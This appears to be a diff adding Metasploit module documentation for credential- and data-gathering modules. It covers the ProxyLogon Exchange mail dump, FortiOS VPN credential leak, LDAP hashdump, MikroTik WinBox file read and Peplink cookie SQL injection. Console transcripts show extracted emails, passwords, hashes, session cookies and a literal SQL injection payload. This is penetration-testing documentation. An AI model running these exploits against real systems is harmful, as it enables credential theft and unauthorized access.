## Scenarios
```
msf6 auxiliary(gather/exchange_proxylogon_collector) > options
Module options (auxiliary/gather/exchange_proxylogon_collector):
Name Current Setting Required Description
---- --------------- -------- -----------
ATTACHMENTS true yes Dump documents attached to an email
EMAIL gaston.lagaffe@pwned.lab yes The email account what you want dump
FOLDER inbox yes The email folder what you want dump
METHOD POST yes HTTP Method to use for the check (only). (Accepted: GET, POST)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.20.2.110 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGET no Force the name of the internal Exchange server targeted
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Dump (Emails) Dump user emails from exchange server
msf6 auxiliary(gather/exchange_proxylogon_collector) > run
[*] Running module against 172.20.2.110
[*] https://172.20.2.110:443 - Attempt to exploit for CVE-2021-26855
[*] * internal server name (EXCH2K16)
[*] https://172.20.2.110:443 - Sending autodiscover request
[*] * Server: d8a7cc8c-7180-4b80-b53e-57c3449bcd4e@pwned.lab
[*] * LegacyDN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=9b9d8cf634f44ec4a0eda5c1c7c311da-Gasto
[*] https://172.20.2.110:443 - Sending mapi request
[*] * sid: S-1-5-21-3756917241-677735496-3570881102-1141 (gaston.lagaffe@pwned.lab)
[*] https://172.20.2.110:443 - Selecting the first internal server found
[*] * targeting internal: server2
[*] https://172.20.2.110:443 - Attempt to dump emails for <gaston.lagaffe@pwned.lab>
[*] * successfuly connected to: inbox
[*] * selected folder: inbox (AQAYAGdhc3Rvbi5sYWdhZmYAZUBwd25lZC5sYWIALgAAA+uQmQIqiSJLiXyYWVYT65MBACRuvwACXEpAuhG13iUjVgwAAAIBDAAAAA==)
[*] * number of email found: 4
[*] https://172.20.2.110:443 - Processing dump of 4 items
[*] * download item: CQAAABYAAAAkbr8AAlxKQLoRtd4lI1YMAAAA6ItL
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_455715.txt
[*] -> attachment: AAAYAGdhc3Rvbi5sYWdhZmZlQHB3bmVkLmxhYgBGAAAAAADrkJkCKokiS4l8mFlWE+uTBwAkbr8AAlxKQLoRtd4lI1YMAAAAAAEMAAAkbr8AAlxKQLoRtd4lI1YMAAAA6IA6AAABEgAQAFejlEQ+wzFDoBLnyMUbSk4= (Messagerie - Administrator - Outlook.pdf)
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_392827.pdf
[*] -> attachment: AAAYAGdhc3Rvbi5sYWdhZmZlQHB3bmVkLmxhYgBGAAAAAADrkJkCKokiS4l8mFlWE+uTBwAkbr8AAlxKQLoRtd4lI1YMAAAAAAEMAAAkbr8AAlxKQLoRtd4lI1YMAAAA6IA6AAABEgAQAAZVIXO5iaNNtJIokpS4aB4= (03.png)
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_187857.png
[*]
[*] * download item: CQAAABYAAAAkbr8AAlxKQLoRtd4lI1YMAAAA6ItK
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_470603.txt
[*]
[*] * download item: CQAAABYAAAAkbr8AAlxKQLoRtd4lI1YMAAAAAAEc
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_296938.txt
[*]
[*] * download item: CQAAABYAAAAkbr8AAlxKQLoRtd4lI1YMAAAAAAEX
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120226_default_172.20.2.110_gaston.lagaffep_524052.txt
[*]
[*] Auxiliary module execution completed
msf6 auxiliary(gather/exchange_proxylogon_collector) > set action Dump\ (Contacts)
action => Dump (Contacts)
msf6 auxiliary(gather/exchange_proxylogon_collector) > run
[*] Running module against 172.20.2.110
[*] https://172.20.2.110:443 - Attempt to exploit for CVE-2021-26855
[*] * internal server name (EXCH2K16)
[*] https://172.20.2.110:443 - Sending autodiscover request
[*] * Server: d8a7cc8c-7180-4b80-b53e-57c3449bcd4e@pwned.lab
[*] * LegacyDN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=9b9d8cf634f44ec4a0eda5c1c7c311da-Gasto
[*] https://172.20.2.110:443 - Sending mapi request
[*] * sid: S-1-5-21-3756917241-677735496-3570881102-1141 (gaston.lagaffe@pwned.lab)
[*] https://172.20.2.110:443 - Selecting the first internal server found
[*] * targeting internal: server2
[*] https://172.20.2.110:443 - Attempt to dump contacts for <gaston.lagaffe@pwned.lab>
[*] * successfuly connected to: contacts
[*] * selected folder: contacts (AQAYAGdhc3Rvbi5sYWdhZmYAZUBwd25lZC5sYWIALgAAA+uQmQIqiSJLiXyYWVYT65MBACRuvwACXEpAuhG13iUjVgwAAAIBDgAAAA==)
[*] * number of contact found: 1
[*] https://172.20.2.110:443 - Processing dump of 1 items
[+] * file saved to /home/mekhalleh/.msf4/loot/20210312120243_default_172.20.2.110_gaston.lagaffep_160567.txt
[*] Auxiliary module execution completed
msf6 auxiliary(gather/exchange_proxylogon_collector) >
```
## References
1. <https://proxylogon.com/>
2. <https://aka.ms/exchangevulns>
3. <https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/distinguishedfolderid>
4. <https://github.com/3gstudent/Homework-of-Python/blob/master/ewsManage.py>
@@ -0,0 +1,74 @@
## Vulnerable Application
Fortinet FortiOS versions 5.4.6 to 5.4.12, 5.6.3 to 5.6.7 and 6.0.0 to 6.0.4 are vulnerable to
a path traversal vulnerability within the SSL VPN web portal which allows unauthenticated attackers
to download FortiOS system files through specially crafted HTTP requests.
This module exploits this vulnerability to read the usernames and passwords of users currently logged
into the FortiOS SSL VPN, which are stored in plaintext in the `/dev/cmdb/sslvpn_websession` file on
the VPN server.
## Verification Steps
1. Start msfconsole
2. Do: use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
3. Do: set RHOSTS [IP]
4. Do: set RPORT 10443
5. Do: run
## Options
### DUMP_FORMAT
Dump format. (Accepted: raw, ascii)
### STORE_CRED
If set, then store gathered credentials into the Metasploit creds database.
## Scenarios
### FortiOS 6.0
```
msf6 > use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > show options
Module options (auxiliary/gather/fortios_vpnssl_traversal_creds_leak):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_FORMAT raw yes Dump format. (Accepted: raw, ascii)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 10443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
STORE_CRED true no Store credential into the database.
TARGETURI /remote yes Base path
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set RHOSTS *redacted*
RHOSTS => *redacted*
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run
[*] https://*redacted*:10443 - Trying to connect.
[+] https://*redacted*:10443 - Vulnerable!
[+] https://*redacted*:10443 - File saved to /home/gwillcox/.msf4/loot/20210226142747_default_*redacted*__761592.txt
[+] https://*redacted*:10443 - 1 credential(s) found!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
*redacted* *redacted* 10443/tcp (https) admin *redacted* Password
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > cat /home/gwillcox/.msf4/loot/20210226142747_default_*redacted*__761592.txt
[*] exec: cat /home/gwillcox/.msf4/loot/20210226142747_default_*redacted*__761592.txt
var fgt_lang =
/V^PҽwV^V^V^*redacted*admin*redacted*RemoteUSersfull-accessrootбmsf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >
```
@@ -0,0 +1,199 @@
## Vulnerable Application
### Description
This module uses an LDAP connection to dump data from LDAP server
using an anonymous or authenticated bind.
Searching for specific attributes it collects user credentials.
### Setup
Tested in the wild.
You may eventually setup an intentionally insecure OpenLDAP server in docker.
The below OpenLDAP server does not have any ACL, therefore the hashPassword
attributes are readable by anonymous clients.
```
$ git clone https://github.com/HynekPetrak/bitnami-docker-openldap.git
$ cd bitnami-docker-openldap
$ docker-compose up -d
Creating bitnami-docker-openldap_openldap_1 ... done
msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 auxiliary(gather/ldap_hashdump) > set RPORT 1389
RPORT => 1389
msf5 auxiliary(gather/ldap_hashdump) > options
Module options (auxiliary/gather/ldap_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
BASE_DN no LDAP base DN if you already have it
BIND_DN no The username to authenticate to LDAP server
BIND_PW no Password for the BIND_DN
PASS_ATTR userPassword yes LDAP attribute, that contains password hashes
RHOSTS 127.0.0.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1389 yes The target port
SSL false no Enable SSL on the LDAP connection
USER_ATTR dn no LDAP attribute, that contains username
Auxiliary action:
Name Description
---- -----------
Dump Dump all LDAP data
msf5 auxiliary(gather/ldap_hashdump) >
msf5 auxiliary(gather/ldap_hashdump) > run
[*] Running module against 127.0.0.1
[*] Discovering base DN automatically
[*] Searching root DSE for base DN
[+] Discovered base DN: dc=example,dc=org
[*] Dumping LDAP data from server at 127.0.0.1:1389
[*] Storing LDAP data in loot
[+] Saved LDAP data to /home/hynek/.msf4/loot/20200801220435_default_127.0.0.1_LDAPInformation_704646.txt
[*] Searching for attribute: userPassword
[*] Taking dn attribute as username
[+] Credentials found: cn=user01,ou=users,dc=example,dc=org:password1
[+] Credentials found: cn=user02,ou=users,dc=example,dc=org:password2
[*] Auxiliary module execution completed
msf5 auxiliary(gather/ldap_hashdump) >
```
## Verification Steps
Follow [Setup](#setup) and [Scenarios](#scenarios).
## Actions
### Dump
Dump all LDAP data from the LDAP server.
## Options
### BASE_DN
If you already have the LDAP base DN, you may set it in this option.
### USER_ATTR
LDAP attribute to take the user name from. Defaults to DN, however you may
wish to change it UID, name or similar.
### PASS_ATTR
LDAP attribute to take the password hash from. Defaults to userPassword,
some LDAP server may use different attribute, e.g. unixUserPassword,
sambantpassword, sambalmpassword.
## Scenarios
### Avaya Communication Manager via anonymous bind
```
msf5 > use auxiliary/gather/ldap_hashdump
msf5 auxiliary(gather/ldap_hashdump) > options
Module options (auxiliary/gather/ldap_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
BASE_DN no LDAP base DN if you already have it
PASS_ATTR userPassword yes LDAP attribute, that contains password hashes
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 389 yes The target port
SSL false no Enable SSL on the LDAP connection
USER_ATTR dn no LDAP attribute, that contains username
Auxiliary action:
Name Description
---- -----------
Dump Dump all LDAP data
msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
RHOSTS => [redacted_ip_address]
msf5 auxiliary(gather/ldap_hashdump) > run
[*] Running module against [redacted_ip_address]
[*] Discovering base DN automatically
[*] Searching root DSE for base DN
[+] Discovered base DN: dc=vsp
[*] Dumping LDAP data from server at [redacted_ip_address]:389
[*] Storing LDAP data in loot
[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121633_default_[redacted_ip_address]_LDAPInformation_716210.txt
[*] Searching for attribute: userPassword
[*] Taking dn attribute as username
[+] Credentials found: uid=cust,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
[+] Credentials found: uid=admin,ou=People,dc=vsp:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
[*] Auxiliary module execution completed
msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
USER_ATTR => uid
msf5 auxiliary(gather/ldap_hashdump) > run
[*] Running module against [redacted_ip_address]
[*] Discovering base DN automatically
[*] Searching root DSE for base DN
[+] Discovered base DN: dc=vsp
[*] Dumping LDAP data from server at [redacted_ip_address]:389
[*] Storing LDAP data in loot
[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726121718_default_[redacted_ip_address]_LDAPInformation_712562.txt
[*] Searching for attribute: userPassword
[*] Taking uid attribute as username
[+] Credentials found: cust:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
[+] Credentials found: admin:{SSHA}AZKja92fbuuB9SpRlHqaoXxbTc43Mzc2MDM1Ng==
[*] Auxiliary module execution completed
msf5 auxiliary(gather/ldap_hashdump) >
```
### NASDeluxe - NAS with Samba LM/NTLM hashes
```
msf5 auxiliary(gather/ldap_hashdump) > set USER_ATTR uid
USER_ATTR => uid
msf5 auxiliary(gather/ldap_hashdump) > set PASS_ATTR sambantpassword
PASS_ATTR => sambantpassword
msf5 auxiliary(gather/ldap_hashdump) > set RHOSTS [redacted_ip_address]
RHOSTS => [redacted_ip_address]
msf5 auxiliary(gather/ldap_hashdump) > run
[*] Running module against [redacted_ip_address]
[*] Discovering base DN automatically
[*] Searching root DSE for base DN
[+] Discovered base DN: dc=server,dc=nas
[*] Dumping LDAP data from server at [redacted_ip_address]:389
[*] Storing LDAP data in loot
[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201006_default_[redacted_ip_address]_LDAPInformation_026574.txt
[*] Searching for attribute: sambantpassword
[*] Taking uid attribute as username
[+] Credentials found: admin:209C6174DA490CAEB422F3FA5A7AE634
[+] Credentials found: joe:58E8C758A4E67F34EF9C40944EB5535B
[*] Auxiliary module execution completed
msf5 auxiliary(gather/ldap_hashdump) > run
[*] Running module against [redacted_ip_address]
[*] Discovering base DN automatically
[*] Searching root DSE for base DN
[+] Discovered base DN: dc=server,dc=nas
[*] Dumping LDAP data from server at [redacted_ip_address]:389
[*] Storing LDAP data in loot
[+] Saved LDAP data to /home/hynek/.msf4/loot/20200726201731_default_[redacted_ip_address]_LDAPInformation_427417.txt
[*] Searching for attribute: sambalmpassword
[*] Taking uid attribute as username
[+] Credentials found: admin:F0D412BD764FFE81AAD3B435B51404EE
[+] Credentials found: joe:3417BE166A79DDE2AAD3B435B51404EE
[*] Auxiliary module execution completed
```
@@ -0,0 +1,60 @@
## Vulnerable Application
MikroTik RouterOS allows unauthenticated remote attackers to read arbitrary files
through a directory traversal through the WinBox interface (typically port 8291).
Vulnerable versions of MikroTik RouterOS:
* (bugfix) 6.30.1-6.40.7
* (current) 6.29-6.42
* (RC) 6.29rc1-6.43rc3
MikroTik images can be downloaded from [here](https://mikrotik.com/download/archive)
### Adding Users
To add users to the MikroTik device, use the following commands:
Get the groups first
```
/user group print
```
Add a user
```
/user add name=[name] password=[password] group=[group]
```
## Verification Steps
1. Start msfconsole
1. Do: `use auxiliary/gather/mikrotik_winbox_fileread`
1. Do: `set rhosts [IP]`
1. Do: `run`
1. You should credentials.
## Options
## Scenarios
### Mikrotik Cloud Router RouterOS 6.40.4
```
msf5 > use auxiliary/gather/mikrotik_winbox_fileread
msf5 auxiliary(gather/mikrotik_winbox_fileread) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf5 auxiliary(gather/mikrotik_winbox_fileread) > run
[*] Running for 1.1.1.1...
[*] 1.1.1.1 - Session ID: 54
[*] 1.1.1.1 - Requesting user database through exploit
[*] 1.1.1.1 - Exploit successful, attempting to extract usernames & passwords
[*] 1.1.1.1 - Extracted Username: "write" and password "write"
[*] 1.1.1.1 - Extracted Username: "read" and password "read"
[*] 1.1.1.1 - Extracted Username: "admin" and password ""
[*] 1.1.1.1 - Extracted Username: "user2" and password "password1"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
@@ -0,0 +1,430 @@
## Vulnerable Application
### Introduction
This module exploits an SQLi vulnerability in the web interface of Peplink
routers running outdated firmware (confirmed on version 7.0.0-build1904 and below).
The vulnerability is due to the lack of sanitization applied to the bauth cookie,
Successful exploitation of the vulnerability allows unauthenticated attackers to get
into sessions of legitimate users (bypassing authentication).
Exploitation of this vulnerability requires that there is at least one active user session
created in the last 4 hours (or session lifetime if it was modified).
## Verification Steps
## Options
### BypassLogin
If true, don't retrieve cookies, just use the SQL injection vulnerability to bypass the login
In the case where expired and non-expired admin sessions exist, might select the expired session if enabled.
### AdminOnly
Only attempt to retrieve cookies of privilegied users (admins)
### EnumPrivs
Retrieve the privilege associated with each session
### EnumUsernames
Retrieve the username associated with each session
### LimitTries
The max number of sessions to try (from most recent), set to avoid checking expired ones needlessly
## Scenarios
Vulnerable firmware downloadable from [here](https://www.peplink.com/support/downloads/archive/).
It's possible to reproduce the vulnerability without owning a peplink router, using
[FusionHub](https://www.peplink.com/products/fusionhub/).
Refer to its installation guide, use a free Solo license.
### Firmware version 6.3.2
BypassLogin:
```
msf5 auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true
msf5 auxiliary(gather/peplink_bauth_sqli) > run
[*] Running module against 192.168.1.254
[+] Target seems to be vulnerable
[*] Checking for admin cookie : ' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')--
[+] Retrieved config, saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkconfigur_203870.bin
[*] Retrieving fhlicense_info
[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkfhlicens_829403.txt
[*] Retrieving sysinfo
[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinksysinfo_824042.txt
[*] Retrieving macinfo
[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkmacinfo_992224.txt
[*] Retrieving hostnameinfo
[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkhostname_183370.txt
[*] Retrieving uptime
[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkuptime_523334.txt
[*] Retrieving client_info
[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkclient_i_704361.txt
[*] Retrieving hubport
[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkhubport_264378.txt
[*] Retrieving fhstroute
[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkfhstrout_701714.txt
[*] Retrieving ipsec
[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkipsec_664157.txt
[*] Retrieving wan_summary
[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkwan_summ_936160.txt
[*] Retrieving firewall
[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkfirewall_270172.txt
[*] Retrieving cert_info
[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkcert_inf_201536.txt
[*] Retrieving mvpn_summary
[+] Saved at /home/redouane/.msf4/loot/20200802152344_default_192.168.1.254_peplinkmvpn_sum_261747.txt
[*] Auxiliary module execution completed
msf5 auxiliary(gather/peplink_bauth_sqli) >
```
The config is a .tar.gz archive with an added 36-byte header, you can extract the plaintext config:
```
$ dd if=20200802_fshhw1_1135E8A0DD29.conf of=config.tar.gz skip=36 bs=1
$ tar vxf config.tar.gz
```
The config usually includes the admin password in cleartext.
Note: it's also possible to upload a modified config.
```
$ cat config
ADMIN_HTTPS_ENABLE="yes"
ADMIN_HTTPS_LANONLY="no"
ADMIN_HTTPS_PORT="443"
ADMIN_HTTP_ENABLE="yes"
ADMIN_HTTP_TO_HTTPS="yes"
ADMIN_LANONLY="no"
ADMIN_NAME="admin"
ADMIN_PASSWORD="mySECUREpassword1"
ADMIN_PORT="80"
ADMIN_ROA_PASSWORD="user"
ADMIN_SESSION_TIMEOUT="14400"
CONFIG_VERSION="6.0"
DHCP_SERVER="enable"
FIREWALL_IDS="yes"
HOSTNAME="peplink"
IPSEC_NAT="yes"
LAN_CONN_METHOD="static"
LAN_IPADDR="192.168.1.254"
LAN_NETMASK="255.255.255.0"
LEFTTIME_USAGE="yes"
...
```
EnumPrivs and EnumUsernames:
```
msf5 auxiliary(sqli/peplink_bauth_sqli) > set EnumPrivs true
EnumPrivs => true
msf5 auxiliary(sqli/peplink_bauth_sqli) > set EnumUsernames true
EnumUsernames => true
msf5 auxiliary(sqli/peplink_bauth_sqli) > run
[*] Running module against 192.168.1.254
[+] Target seems vulnerable
[*] There are 2 (possibly expired) sessions
[*] Trying the ids from the most recent login
[+] Found cookie wPJLPS6lqt8Ushwz1tlmz5tRbvI1ybwWRaBx2GRi3Qcu8, username = user, with read-only permissions
[+] Found cookie aLvFyqho3JYoYSc7EROYWU5A7c4pz9IwV66mvnIzYwMPr, username = admin, with read/write permissions
[*] Checking for admin cookie : wPJLPS6lqt8Ushwz1tlmz5tRbvI1ybwWRaBx2GRi3Qcu8
[*] Checking for admin cookie : aLvFyqho3JYoYSc7EROYWU5A7c4pz9IwV66mvnIzYwMPr
... <as above, gathering of data>
[*] Auxiliary module execution completed
msf5 auxiliary(sqli/peplink_bauth_sqli) >
```
Verbose:
When you enable verbose, you get the parsed XML document displayed.
```
msf5 auxiliary(gather/peplink_bauth_sqli) > set Verbose true
msf5 auxiliary(gather/peplink_bauth_sqli) > set BypassLogin true
msf5 auxiliary(gather/peplink_bauth_sqli) > run
[*] Running module against 192.168.1.254
[+] Target seems to be vulnerable
[*] Checking for admin cookie : ' or id IN (select s.id from sessions as s left join sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')--
[+] Retrieved config, saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkconfigur_780974.bin
[*] Retrieving fhlicense_info
[+] data
[+] license
[+] bandwidth
[+] 0
[+] sessions
[+] 0
[+] err_desc
[+] Virtual machine server changed.
[+] force_lic_page
[+] 1
[+] activated
[+] 0
[+] vm_server_address
[+] expired
[+] 0
[+] license_type
[+] Invalid
[+] expiry_date
[+] 2021-08-02
[+] sn
[+] 1135-E8A0-DD29
[+] license_key
[+] YCB7EAN54FAEMTDF
[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkfhlicens_867800.txt
[*] Retrieving sysinfo
[+] data
[+] sysinfo
[+] legal
[+] company
[+] Peplink
[+] mvpn_version
[+] 5.0.0
[+] version
[+] 6.3.2 build 1424
[+] serial
[+] 1135-E8A0-DD29
[+] product_code
[+] hardware_revision
[+] 1
[+] desc_support
[+] product_name
[+] Peplink FusionHub
[+] name
[+] 1135-E8A0-DD29
[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinksysinfo_739792.txt
[*] Retrieving macinfo
[+] data
[+] macinfo
[+] port {id=0}
[+] mac
[+] 08:00:27:52:8b:fc
[+] name
[+] WAN
[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkmacinfo_307720.txt
[*] Retrieving hostnameinfo
[+] data
[+] hostname_info
[+] hostname
[+] 1135-e8a0-dd29
[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkhostname_534719.txt
[*] Retrieving uptime
[+] data
[+] subscription_mode
[+] systime
[+] Sun Aug 02 14:31:21 CET 2020
[+] uptime
[+] elapsed
[+] 2986
[+] info
[+] 0 days 0 hours 49 minutes
[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkuptime_233915.txt
[*] Retrieving client_info
[+] data
[+] client_status
[+] reserved_mac
[+] client_list
[+] client {type=0}
[+] rate_down
[+] 0
[+] rate_up
[+] 0
[+] active
[+] mac
[+] 10:08:B1:CC:97:41
[+] ip {id=0}
[+] 192.168.1.222
[+] ipn
[+] 3232235998
[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkclient_i_419158.txt
[*] Retrieving hubport
[+] data
[+] port {id=wan}
[+] mvpn_advertise_wan_network
[+] tcpmss
[+] mtu
[+] 1440
[+] pppoe_sn
[+] pppoe_password
[+] pppoe_user
[+] dns_custom_servers
[+] 8.8.8.8 1.1.1.1
[+] dns_auto
[+] dhcp_hostname
[+] dhcp_client_id
[+] mvpn_default_to_lan
[+] gateway
[+] 192.168.1.1
[+] netmask
[+] 255.255.255.0
[+] ipaddr
[+] 192.168.1.254
[+] bridge_mvpn
[+] bridge_mode
[+] conn_method
[+] static
[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkhubport_064122.txt
[*] Retrieving fhstroute
[+] data
[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkfhstrout_739377.txt
[*] Retrieving ipsec
[+] data
[+] ipsec
[+] order
[+] nat
[+] linkinfo
[+] link {id=1}
[+] port {id=1}
[+] port_name
[+] WAN
[+] port_type
[+] ethernet
[+] actiavted
[+] name
[+] WAN
[+] enable
[+] order
[+] 1
[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkipsec_320666.txt
[*] Retrieving wan_summary
[+] data
[+] connection_info
[+] conn {id=1}
[+] conn_method
[+] method
[+] dhcp
[+] modem_idle
[+] timeout
[+] 180
[+] backup_group
[+] 0
[+] mvpn_nat
[+] nat
[+] enable
[+] port_id
[+] 1
[+] name
[+] WAN
[+] order
[+] 1
[+] physical_info
[+] port {id=1}
[+] ethernet_info
[+] simulated_mac
[+] default_mac
[+] mac_clone
[+] mtu
[+] advertise
[+] speed
[+] port_name
[+] WAN
[+] type
[+] ethernet
[+] activated
[+] yes
[+] count
[+] 1
[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkwan_summ_918579.txt
[*] Retrieving firewall
[+] data
[+] firewall_ids
[+] firewall_mvpn
[+] private_firewall
[+] default
[+] accept
[+] outbound_firewall
[+] default
[+] accept
[+] inbound_firewall
[+] default
[+] accept
[+] linkinfo
[+] link {id=1}
[+] port {id=1}
[+] port_name
[+] WAN
[+] port_type
[+] ethernet
[+] actiavted
[+] name
[+] WAN
[+] enable
[+] order
[+] 1
[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkfirewall_758402.txt
[*] Retrieving cert_info
[+] data
[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkcert_inf_603637.txt
[*] Retrieving mvpn_summary
[+] data
[+] mvpn
[+] order
[+] mvpn_nat_mode_dhcp_server
[+] has_nat_profile
[+] 0
[+] nat_remote
[+] 0
[+] subnet_mask
[+] 24
[+] pool_end
[+] 169.254.131.254
[+] pool_start
[+] 169.254.131.1
[+] enable
[+] 1
[+] restrict_advertise
[+] no
[+] hc_mode
[+] 0
[+] rn
[+] 1135-E8A0-DD29
[+] site_id
[+] 333
[+] l2vpn
[+] wanport_supported
[+] false
[+] wanport_name
[+] WAN Port Unavailable
[+] Saved at /home/redouane/.msf4/loot/20200802153115_default_192.168.1.254_peplinkmvpn_sum_970830.txt
[*] Auxiliary module execution completed
msf5 auxiliary(gather/peplink_bauth_sqli) >
```
Loot:
```
msf5 auxiliary(gather/peplink_bauth_sqli) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.168.1.254 peplink configuration tar gz application/binary /home/redouane/.msf4/loot/20200802153714_default_192.168.1.254_peplinkconfigur_157106.bin
192.168.1.254 peplink fhlicense_info text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkfhlicens_326973.txt
192.168.1.254 peplink sysinfo text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinksysinfo_385353.txt
192.168.1.254 peplink macinfo text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkmacinfo_525407.txt
192.168.1.254 peplink hostnameinfo text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkhostname_613045.txt
192.168.1.254 peplink uptime text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkuptime_488261.txt
192.168.1.254 peplink client_info text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkclient_i_529454.txt
192.168.1.254 peplink hubport text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkhubport_938262.txt
192.168.1.254 peplink fhstroute text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkfhstrout_737113.txt
192.168.1.254 peplink ipsec text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkipsec_055562.txt
192.168.1.254 peplink wan_summary text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkwan_summ_957693.txt
192.168.1.254 peplink firewall text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkfirewall_777226.txt
192.168.1.254 peplink cert_info text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkcert_inf_765605.txt
192.168.1.254 peplink mvpn_summary text/xml /home/redouane/.msf4/loot/20200802153715_default_192.168.1.254_peplinkmvpn_sum_890141.txt
msf5 auxiliary(gather/peplink_bauth_sqli) >
```
@@ -0,0 +1,86 @@
## Introduction
This module uses the Shodan API to return all port information found on a given host IP.
#### NOTE:
In order for this module to function properly, a Shodan API key is needed. You can register for a free account here: https://account.shodan.io/register
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/gather/shodan_host`
3. Do: `set RHOSTS <targetip>`
4. Do: `set SHODAN_APIKEY <your apikey>`
5. Do: `run`
